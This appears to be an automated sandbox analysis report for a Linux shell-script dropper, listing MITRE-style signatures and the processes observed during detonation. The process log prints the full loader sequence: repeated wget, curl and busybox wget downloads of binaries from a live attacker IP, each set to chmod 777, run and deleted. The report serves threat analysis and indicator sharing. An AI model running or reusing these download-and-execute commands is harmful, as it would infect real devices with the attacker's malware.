Analysis Overview
SHA256
ae4cce441a4ee9a32ef001e961dc3cd39be6fffb0e3e6ceb2c22d37836963f0c
Threat Level: Shows suspicious behavior
The file 238ce56c9ddc1a35bd7134b8f1950471.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 01:01
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 01:01
Reported
2024-10-29 01:04
Platform
debian9-mipsel-20240611-en
Max time kernel
79s
Max time network
81s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
Processes
/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh
[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
